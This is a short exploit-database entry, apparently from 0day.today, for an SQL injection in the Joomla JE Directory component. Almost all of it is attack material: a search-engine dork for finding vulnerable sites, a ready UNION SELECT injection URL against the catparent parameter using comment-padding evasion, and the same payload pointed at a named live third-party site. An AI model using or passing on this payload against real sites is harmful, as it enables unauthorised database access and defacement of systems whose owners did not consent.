id: 20529
date: 03/19/2013
title: Joomla Component JE Directorys <= (catparent) SQL injection Vulnerability
author: ByEge
cves: 

Google Dork : index.php?option=com_jedirectory

http://target/index.php?option=com_jedirectory&view=cat_parent&catparent=1/**/and/**/false/**/union/**/select/**/1,CHAR(60,104,49,62,66,121,69,103,101,60,47,104,49,62),3,4,5--

Test url: http://joomlaextensions.co.in/jedirectory/index.php?option=com_jedirectory&view=cat_parent&catparent=1/**/and/**/false/**/union/**/select/**/1,CHAR(60,104,49,62,66,121,69,103,101,60,47,104,49,62),3,4,5--

#  0day.today [2023-03-26]  #